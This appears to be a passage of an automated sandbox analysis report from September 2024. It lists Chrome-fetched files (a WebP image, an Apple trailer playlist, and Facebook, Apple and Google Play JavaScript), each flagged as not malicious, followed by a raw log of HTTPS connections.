                                                                                                                                                                                                                                Preview:RIFF\$..WEBPVP8 P$...~...*..(.>Q".E#.!..V48...7~>=...3_.........9~.......j...;.w.'w.......?.._.k.e.{...........H...`........_.?.{...........P......{W.................?.....p>..d..{..............j.............u5.o........#.o..#.......w....E..w.m?.?...z......=N~#.g..^...j...W.S....|.........._...?...~.}3.K......J.........'..................u.......uW....cX.Eq.O....z.T0....rs.h.)o..!.Z..c....=P..w.g....!-..N.RN.P#.0...4!X....D.J..G.P3...f....L:.@....v\....,.......,..r..G$...M.k".>.v.b......[.5.1B.q..../K.....Xv2..~u.@..........M}?d].....-.....J_.Sot?.[fMxB..nUu.qJ[{[....R1.....K...z..;{|.......q.\.k.s...f.{....d...\....8.;...o9..J|.[...W...Z..i...0.f.G.........O...c,y.....7.._....)..I.".&....+..t.....0.>..FW...,....B8&.c.3zS..{)5.....rmR.&s...F...!......u...de7...*...F.=.`}o'.........M..r....}.......{)....c..'.^Qja..c.....pFnY'5r.*Lg){...L...g.....$._.`...I.....0...I/.... ...Q......@t.M-s...G@YAI..L%fP.&) ..m.g<.!^.A25.Z....B..{.,.f.....j.q.q...,.,l] ..'k.l
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:M3U playlist, ASCII text, with very long lines (326)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):7835
                                                                                                                                                                                                                                Entropy (8bit):5.7037022399580755
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:wfB/5+dzPThTETLTf6LIErhvEpLAQAtuUs59BbLnSXGAxF:wfN5QfdenfAMuH0XkF
                                                                                                                                                                                                                                MD5:2929F5A19DF395677697F7E2390B7FB1
                                                                                                                                                                                                                                SHA1:590DDA6F95DDE4F554323144FC0BB9DBF5AA26FA
                                                                                                                                                                                                                                SHA-256:DBA7DBBDB20E1C8DC044C571D1F9327F2BE09C3B11650EB6F8D7BFD3A431E189
                                                                                                                                                                                                                                SHA-512:A109107075813C58669C266F9EB601A5C39F497C5EBD46D776D812D56E7920EDFF1B03CCCFA3D6C36F3F9AE8A35CE4C6AA7100F843CE0F9B9EBE66D94185602A
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:#EXTM3U.#EXT-X-VERSION:7.#EXT-X-INDEPENDENT-SEGMENTS..#-- en (3) --.#EXT-X-MEDIA:TYPE=AUDIO,LANGUAGE="en",GROUP-ID="audio-HE2-stereo-32",NAME="English",DEFAULT=YES,AUTOSELECT=YES,CHANNELS="2",URI="https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo221/v4/1d/b1/35/1db13506-dfce-582e-6daa-09ae6735af46/P875466468_Anull_audio_en_gr32_mp4a-40-2.m3u8".#EXT-X-MEDIA:TYPE=AUDIO,LANGUAGE="en",GROUP-ID="audio-stereo-64",NAME="English",DEFAULT=YES,AUTOSELECT=YES,CHANNELS="2",URI="https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo211/v4/38/7d/6c/387d6c85-7c78-ffab-d933-df87a038d9f9/P875466468_Anull_audio_en_gr64_mp4a-40-2.m3u8".#EXT-X-MEDIA:TYPE=AUDIO,LANGUAGE="en",GROUP-ID="audio-stereo-128",NAME="English",DEFAULT=YES,AUTOSELECT=YES,CHANNELS="2",URI="https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo211/v4/92/6e/dc/926edca5-b31b-a5ab-a276-61c326313ac5/P875466468_Anull_audio_en_gr128_mp4a-40-2.m3u8"..#EXT-X-I-FRAME-STREAM-INF:AVERAGE-BANDWIDTH=190609,_AVG-BANDWIDT
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (3175)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):45694
                                                                                                                                                                                                                                Entropy (8bit):5.118242929635633
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:tpi7T07ytsSwuLFB3t8KbX3zrcW3HsBtuv3BtlK7vKH5v9u8kEFsW1:tpK1L5bTIByv9u1EFd
                                                                                                                                                                                                                                MD5:8B2EA74C2950F702116F9B02ABC52BCB
                                                                                                                                                                                                                                SHA1:AD7455A6E9F0D7E73BA4B80422EF805FC66F7879
                                                                                                                                                                                                                                SHA-256:FFEA291B7D7F014FDC619350CAC7B5CECF876DD20EFB498EF0D915FE3AC4BA17
                                                                                                                                                                                                                                SHA-512:942397EE9B53797364C02D073689CD3FC049E2EA7AF9D89F19608A61EBB76DA8A554D124F8BE99CECE74EB540806C9BBC383DAC238448D07A42DFC4D421B89A3
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:"use strict";(self.webpackChunk_ember_auto_import_=self.webpackChunk_ember_auto_import_||[]).push([[990],{67990:function(e,t,n){n.r(t),n.d(t,{ClickstreamProcessor:function(){return we}}).var r=n(24178),i=n(32722),o=n(76588),s=function(){}.s.prototype.setDelegate=function(e){return r.SC.attachDelegate(this,e)},s.prototype.localStorageObject=r.tO.localStorageObject,s.prototype.sessionStorageObject=r.tO.sessionStorageObject.var a=function(){this.environment=new s,this.logger=(0,o.RG)("mt-client-constraints")},c={nonEmpty:function(e,t){return!!r.SC.isObject(t)&&t.hasOwnProperty(e)&&r.SC.isDefinedNonNullNonEmpty(t[e])},valueMatches:function(e,t,n){if(!r.SC.isObject(t))return!1.var i=t[e].return t.hasOwnProperty(e)&&n.indexOf(i)>-1}},p="overrideFieldValue",u=function(){}.u.prototype.constrainedValue=function(e,t,n){var r=e&&e.hasOwnProperty(n)?e[n]:null.return this.applyConstraintRules(r,t)},u.prototype.applyConstraintRules=function(e,t){var n=e.return t&&t.blacklisted?n=null:t&&t.hasOwnProp
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (4092)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):13176
                                                                                                                                                                                                                                Entropy (8bit):5.294987153659635
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:58XZIa+UNj42EGkIa+UNjh2EBYgat0b29PRnNGRX2JZun+npvJIxajAQ5uL6:58pNE7NSrt0b29ZnE1KZu+5mx/Q5uO
                                                                                                                                                                                                                                MD5:2645EFD84E35194CF6A31C1F7B29F077
                                                                                                                                                                                                                                SHA1:E6F807F825FEA2575C0EC1BD05B5A305B0C33F0B
                                                                                                                                                                                                                                SHA-256:2530726858E9A0B705EA05C9AF57F2910A9A84871D716D68332E0CB6D306E15D
                                                                                                                                                                                                                                SHA-512:D31EF5851FA2EB31FE84A41A9EE4B0D698742A4C3B4DCE033C02B64E8A1673FE9A20C73BC4BC89C58B703AFE8845748957D017AA95ACEB8BF8CFDEDF8E2377EB
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3iLl54/yM/l/en_GB/uG4EfEPS4Rt.js
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("tidyEvent",["Run"],(function(a,b,c,d,e,f,g){var h=[];function i(){while(h.length){var a=h.shift();a.remove?a.remove():a.unsubscribe&&a.unsubscribe()}}function j(a){var b,c=a;function d(){if(!b)return;b.apply(c,arguments);b=null;c=null}if(c&&c.remove)b=c.remove,c.remove=d;else{b=(a=c)==null?void 0:a.unsubscribe;c.unsubscribe=d}return c}function a(a){h.length||d("Run").onLeave(i);if(Array.isArray(a))for(var b=0;b<a.length;b++)a[b]&&h.push(j(a[b]));else a&&h.push(j(a));return a}g["default"]=a}),98);.__d("DeviceBasedLoginForm",["Event","tidyEvent"],(function(a,b,c,d,e,f,g){"use strict";function a(a,b){c("tidyEvent")(c("Event").listen(a,"click",function(a){a.preventDefault(),b.submit()}))}g.init=a}),98);.__d("DeviceBasedLoginUserLoginDialog",["BDClientSignalCollectionTrigger","BDSignalCollectionData","Base64","Button","DOM","Event","FBBrowserPasswordEncryption","LoginServicePasswordEncryptDecryptEventTypedLogger","cx","ge","promiseDone","tidyEvent"],(function(a,b,c,d
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (21389)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):176168
                                                                                                                                                                                                                                Entropy (8bit):5.469790123757049
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3072:tlPfuAXw7jHWvEPC6xUoAKLZb3AKj5NLJo9v5MF9Vm:j6WWVAKtb3HHY
                                                                                                                                                                                                                                MD5:A6F812862FA6C458FE301D0C0E2A1FD8
                                                                                                                                                                                                                                SHA1:99E5ED7001CF5635FF146751EF7F982BA9FB5BBD
                                                                                                                                                                                                                                SHA-256:A4949472640ABB50A0BA8069D76C7DCAC8276919D924F59DAF891C65F2BAF306
                                                                                                                                                                                                                                SHA-512:784BF8DD18377C8CBDF4453D2649B63AAAE3C410D4DF130FEDC66C38954F45681DC2BC19B4EDC0CBB557880EBE6D49C87088E5A5E20A796344D4CD8B10DD7C15
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3/yg/r/5VtnQAqNe99.js
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("ActorURIConfig",[],(function(a,b,c,d,e,f){a=Object.freeze({PARAMETER_ACTOR:"av",ENCRYPTED_PARAMETER_ACTOR:"eav"});f["default"]=a}),66);.__d("BanzaiLogger",["cr:9989"],(function(a,b,c,d,e,f,g){function h(a){return{log:function(c,d){b("cr:9989").post("logger:"+c,d,a)},create:h}}a=h();c=a;g["default"]=c}),98);.__d("CometEnvironmentSite",[],(function(a,b,c,d,e,f){a=Object.freeze({NONE:0,GENERIC_COMET:1,COMET_ON_MOBILE:2,COMET_ON_INSTAGRAM:3,FB_ACCOUNTS_CENTER:5,CANVAS:6,IG_WWW:7,FRL_ACCOUNTS_CENTER:8,NOVI_CHECKOUT:9,ENTERPRISE_CENTER:10,BIZ_WEB:11,BUSINESS_FB:12,HORIZON_WORLDS:14,FB_WEB:15,WHATSAPP:17,META_DOT_COM:18,OCULUS_DOT_COM:19,FRL_FAMILY_CENTER:20,WHATSAPP_FAQ:23,IG_ACCOUNTS_CENTER:24,ADS_MANAGER_ON_BLUE:25,MESSENGER_FAMILY_CENTER:26,META_WORK_PORTFOLIO:27,BARCELONA_WEB:29,FB_FAMILY_CENTER:30,CANDIDATE_PORTAL:31,META_HELP:32,FRL_AUTH:33,META_LLAMA:34,IG_GEN_AI_STUDIO:35,FB_GEN_AI_STUDIO:36,IG_FAMILY_CENTER:37,IG_PRIVACY_CENTER:38,IG_HELP_CENTER:39,ABOUT_META
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (5770)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):801516
                                                                                                                                                                                                                                Entropy (8bit):5.62250697533646
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24576:5gI/dB/0dAlgEAOJ4JwwcFPh/0aTEwb3iZbeeseJ7aS8+vgAieOKSqzT9E/qWWOX:5gI/dB/0dAlgEAOJ4JwwcFPh/0aTEwbp
                                                                                                                                                                                                                                MD5:164F0C87771C38415A4648E2F3220000
                                                                                                                                                                                                                                SHA1:5A2FF23AB220DB0EC9C8950DEBCE5078871A633D
                                                                                                                                                                                                                                SHA-256:2750A5AF1E565DF3B182D849D68B5D0ADE5711BA0DFC8096E4E0E5E31872E64C
                                                                                                                                                                                                                                SHA-512:CC683905DD7CE2797AEA9D46EBB8BF43414F32892427FF0C4F5AC8CA92DB07D99BC13A64BB2006AAB7778EFDC1FC7C2876C83C1ACF4A1655545B426CCA6247BC
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:"https://www.gstatic.com/_/boq-play/_/js/k=boq-play.PlayStoreUi.ru.rIMe_465lJE.2021.O/ck=boq-play.PlayStoreUi.Y1yArtXW1Kk.L.B1.O/am=R7cZwOj6QDAJDPAPHgdjAQ/d=1/exm=LEikZe,_b,_tp,byfTOb,lsjVmc/excm=_b,_tp,searchview/ed=1/wt=2/ujg=1/rs=AB1caFXJl0m234JZdkIlc9Y8a_1vUWHvZw/ee=EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;Hs0fpd:jLUKge;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:SdcwHb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;Rdd4dc:WXw8B;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;Uvc8o:VDovNc;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:QIhFr;lOO0Vd:OTA3Ae;nAFL3:s39S4;nAu0tf:z5Gxfe;oGtAuc:sOXFj;pXdRYb:MdUzUe;qafBPd:yDVVkb;qddgKe:xQtZb;sgjhQc:bQAegc;wR5FRb:O1Gjze;xqZiqf:BBI74;yEQyxe:TLjaTd;yxTchf:KUM7Z;zxnPse:GkRiKb/m=ws9Tlc,n73qwf,GkRiKb,e5qFLc,IZT63,UUJqVe,O1Gjze,xUdipf,OTA3Ae,A1yn5d,fKUV3e,aurFic,Ug7Xab,ZwDk9d,V3dDOb,WO9ee,mI3LFb,m9oV,z5Gxfe,ArluEf,q0NEmc,IcVnM,wW2D8b,vrGZEc,fPcQoe,LCkxpb,kr6Nlf,O6y8ed,PrPYRd,MpJwZc,NwH0H,OmgaI,lazG7b,XVMNvd,L1AAkb,KUM7Z,Mlhmy,pYCIec,s39S4,lwddkf,gychg,w9hDv,EEDORb,RMhBfe,SdcwHb,aW3pY,pw70Gc,EFQ78c,Ulmmrd,ZfAoz,mdR7q,xQtZb,JNoxi,kWgXee,MI6k7c,kjKdXe,BVgquf,QIhFr,ovKuLd,hKSk3e,yDVVkb,hc6Ubd,SpsfSb,ebZ3mb,Z5uLle,BBI74,ZDZcre,MdUzUe,A7fCU,zbML3c,zr1jrb,Uas9Hd,pjICDe"
                                                                                                                                                                                                                                Preview:"use strict";_F_installCss(".EDId0c{position:relative}.nhh4Ic{position:absolute;left:0;right:0;top:0;z-index:1;pointer-events:none}.nhh4Ic[data-state=snapping],.nhh4Ic[data-state=cancelled]{transition:transform 200ms}.MGUFnf{display:block;width:28px;height:28px;padding:15px;margin:0 auto;transform:scale(0.7);background-color:#fafafa;border:1px solid #e0e0e0;border-radius:50%;box-shadow:0 2px 2px 0 rgba(0,0,0,.2);transition:opacity 400ms}.nhh4Ic[data-state=resting] .MGUFnf,.nhh4Ic[data-state=cooldown] .MGUFnf{transform:scale(0);transition:transform 150ms}.nhh4Ic .LLCa0e{stroke-width:3.6px;transform:translateZ(1px)}.nhh4Ic[data-past-threshold=false] .LLCa0e{opacity:.3}.rOhAxb{fill:#4285f4;stroke:#4285f4}.A6UUqe{display:none;stroke-width:3px;width:28px;height:28px}.tbcVO{width:28px;height:28px}.bQ7oke{position:absolute;width:0;height:0;overflow:hidden}.A6UUqe.qs41qe{animation-name:quantumWizSpinnerRotate;animation-duration:1568.63ms;animation-iteration-count:infinite;animation-timing-func
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (24721)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):167425
                                                                                                                                                                                                                                Entropy (8bit):5.65366769963361
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:9WH9S6sfBXM8dWFcmaKr55Q8YS8KFC246sfBXIGJ5UpkyJXE6pNiK+mK4kwmO9tR:OMLa8dWFck55z4LeqULXHybkBT
                                                                                                                                                                                                                                MD5:157BD8852DB4A30534786D34C27D9E3F
                                                                                                                                                                                                                                SHA1:90284E3C138F73944BFAC3AD6D24BD1637F48E62
                                                                                                                                                                                                                                SHA-256:36CF25DFC02770F6C4725855E51BCE0368926A56ADC85F8DDE142CA368B914F6
                                                                                                                                                                                                                                SHA-512:969B2931539001E1264EB6B4CD8FB24B3D3200D1D85C52C55E26EE21B15133AAEF61A3CD0808F1F8F47D6665B4B9AF4CE1DDEA3D4B3F438E6E7E2D6673882A33
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("BusinessObjectRelationshipType.facebook",["$InternalEnum"],(function(a,b,c,d,e,f){a=b("$InternalEnum").Mirrored(["AGENCY","NONE","OWNER"]);c=a;f["default"]=c}),66);.__d("BizKitSettingsAdAccountStrings",["fbt","BusinessAccountRenameGating","react"],(function(a,b,c,d,e,f,g,h){"use strict";var i;a=i||d("react");var j=d("BusinessAccountRenameGating").getBARenameEnabled();b=h._("Deactivate ad account");c=h._("Make active");e=h._("Are you sure that you want to deactivate your ad account?");f=h._("{=m0}{=m1}",[h._implicitParam("=m0",a.jsx("p",{children:h._("It will stop all of your current campaigns and prevent you from resuming or creating new ads. Any outstanding balance on your account will be charged to your credit card. The credit cards on your account will be automatically removed after your outstanding balance has been settled. This process may take up to two working days.")})),h._implicitParam("=m1",a.jsx("p",{children:h._("If you'd like to stop your ads but pl
                                                                                                                                                                                                                                No static file info
                                                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                Sep 29, 2024 06:53:50.775794983 CEST49675443192.168.2.4173.222.162.32
                                                                                                                                                                                                                                Sep 29, 2024 06:54:00.385138988 CEST49675443192.168.2.4173.222.162.32
                                                                                                                                                                                                                                Sep 29, 2024 06:54:01.770241022 CEST49735443192.168.2.4185.199.110.153
                                                                                                                                                                                                                                Sep 29, 2024 06:54:01.770328999 CEST44349735185.199.110.153192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:01.770394087 CEST49735443192.168.2.4185.199.110.153
                                                                                                                                                                                                                                Sep 29, 2024 06:54:01.770751953 CEST49735443192.168.2.4185.199.110.153
                                                                                                                                                                                                                                Sep 29, 2024 06:54:01.770770073 CEST44349735185.199.110.153192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:01.771389961 CEST49736443192.168.2.4185.199.110.153
                                                                                                                                                                                                                                Sep 29, 2024 06:54:01.771423101 CEST44349736185.199.110.153192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:01.771481991 CEST49736443192.168.2.4185.199.110.153
                                                                                                                                                                                                                                Sep 29, 2024 06:54:01.771672964 CEST49736443192.168.2.4185.199.110.153
                                                                                                                                                                                                                                Sep 29, 2024 06:54:01.771692038 CEST44349736185.199.110.153192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.244501114 CEST44349736185.199.110.153192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.244945049 CEST49736443192.168.2.4185.199.110.153
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.244966984 CEST44349736185.199.110.153192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.246170998 CEST44349736185.199.110.153192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.246243000 CEST49736443192.168.2.4185.199.110.153
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.247293949 CEST49736443192.168.2.4185.199.110.153
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.247358084 CEST44349736185.199.110.153192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.247550011 CEST49736443192.168.2.4185.199.110.153
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.247559071 CEST44349736185.199.110.153192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.250144005 CEST44349735185.199.110.153192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.250322104 CEST49735443192.168.2.4185.199.110.153
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.250369072 CEST44349735185.199.110.153192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.251816034 CEST44349735185.199.110.153192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.251889944 CEST49735443192.168.2.4185.199.110.153
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.252665997 CEST49735443192.168.2.4185.199.110.153
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.252748013 CEST44349735185.199.110.153192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.291030884 CEST49736443192.168.2.4185.199.110.153
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.306768894 CEST49735443192.168.2.4185.199.110.153
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.306797028 CEST44349735185.199.110.153192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.351283073 CEST49735443192.168.2.4185.199.110.153
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.354671001 CEST44349736185.199.110.153192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.354959965 CEST44349736185.199.110.153192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.355026007 CEST49736443192.168.2.4185.199.110.153
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.394959927 CEST49736443192.168.2.4185.199.110.153
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.394979954 CEST44349736185.199.110.153192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.399461985 CEST49735443192.168.2.4185.199.110.153
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.447419882 CEST44349735185.199.110.153192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.498652935 CEST44349735185.199.110.153192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.498873949 CEST44349735185.199.110.153192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.498915911 CEST44349735185.199.110.153192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.498951912 CEST44349735185.199.110.153192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.498995066 CEST44349735185.199.110.153192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.499047041 CEST49735443192.168.2.4185.199.110.153
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.499047995 CEST49735443192.168.2.4185.199.110.153
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.499109030 CEST44349735185.199.110.153192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.499159098 CEST49735443192.168.2.4185.199.110.153
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.499407053 CEST44349735185.199.110.153192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.499496937 CEST44349735185.199.110.153192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.499542952 CEST49735443192.168.2.4185.199.110.153
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.549268007 CEST49735443192.168.2.4185.199.110.153
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.549335957 CEST44349735185.199.110.153192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.567795038 CEST49737443192.168.2.4185.199.110.153
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.567873955 CEST44349737185.199.110.153192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.567945957 CEST49737443192.168.2.4185.199.110.153
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.568222046 CEST49737443192.168.2.4185.199.110.153
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.568233967 CEST44349737185.199.110.153192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.569355965 CEST49738443192.168.2.4185.199.110.153
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.569367886 CEST44349738185.199.110.153192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.569422007 CEST49738443192.168.2.4185.199.110.153
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.569741011 CEST49739443192.168.2.4185.199.110.153
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.569776058 CEST44349739185.199.110.153192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.569832087 CEST49739443192.168.2.4185.199.110.153
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.569955111 CEST49738443192.168.2.4185.199.110.153
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.569968939 CEST44349738185.199.110.153192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.570158958 CEST49739443192.168.2.4185.199.110.153
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.570180893 CEST44349739185.199.110.153192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.576883078 CEST49740443192.168.2.4104.17.25.14
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.576908112 CEST44349740104.17.25.14192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.577003002 CEST49740443192.168.2.4104.17.25.14
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.577212095 CEST49740443192.168.2.4104.17.25.14
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.577225924 CEST44349740104.17.25.14192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.588356972 CEST49741443192.168.2.4185.199.110.153
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.588428020 CEST44349741185.199.110.153192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.588524103 CEST49741443192.168.2.4185.199.110.153
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.588732958 CEST49741443192.168.2.4185.199.110.153
                                                                                                                                                                                                                                Sep 29, 2024 06:54:02.588745117 CEST44349741185.199.110.153192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:03.020960093 CEST44349737185.199.110.153192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:03.021348000 CEST49737443192.168.2.4185.199.110.153
                                                                                                                                                                                                                                Sep 29, 2024 06:54:03.021426916 CEST44349737185.199.110.153192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:03.021753073 CEST44349737185.199.110.153192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:03.022216082 CEST49737443192.168.2.4185.199.110.153
                                                                                                                                                                                                                                Sep 29, 2024 06:54:03.022290945 CEST49737443192.168.2.4185.199.110.153
                                                                                                                                                                                                                                Sep 29, 2024 06:54:03.022298098 CEST44349737185.199.110.153192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:03.032291889 CEST44349738185.199.110.153192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:03.032599926 CEST49738443192.168.2.4185.199.110.153
                                                                                                                                                                                                                                Sep 29, 2024 06:54:03.032629013 CEST44349738185.199.110.153192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:03.033442020 CEST44349738185.199.110.153192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:03.034209967 CEST49738443192.168.2.4185.199.110.153
                                                                                                                                                                                                                                Sep 29, 2024 06:54:03.034317017 CEST44349738185.199.110.153192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:03.034580946 CEST49738443192.168.2.4185.199.110.153
                                                                                                                                                                                                                                Sep 29, 2024 06:54:03.034785986 CEST44349739185.199.110.153192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:03.034996986 CEST49739443192.168.2.4185.199.110.153
                                                                                                                                                                                                                                Sep 29, 2024 06:54:03.035015106 CEST44349739185.199.110.153192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:03.038667917 CEST44349739185.199.110.153192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:03.038757086 CEST49739443192.168.2.4185.199.110.153
                                                                                                                                                                                                                                Sep 29, 2024 06:54:03.039244890 CEST49739443192.168.2.4185.199.110.153
                                                                                                                                                                                                                                Sep 29, 2024 06:54:03.039325953 CEST44349739185.199.110.153192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:03.039366961 CEST49739443192.168.2.4185.199.110.153
                                                                                                                                                                                                                                Sep 29, 2024 06:54:03.049439907 CEST44349741185.199.110.153192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:03.049495935 CEST44349740104.17.25.14192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:03.049779892 CEST49741443192.168.2.4185.199.110.153
                                                                                                                                                                                                                                Sep 29, 2024 06:54:03.049812078 CEST44349741185.199.110.153192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:03.050113916 CEST49740443192.168.2.4104.17.25.14
                                                                                                                                                                                                                                Sep 29, 2024 06:54:03.050134897 CEST44349740104.17.25.14192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:03.051798105 CEST44349740104.17.25.14192.168.2.4
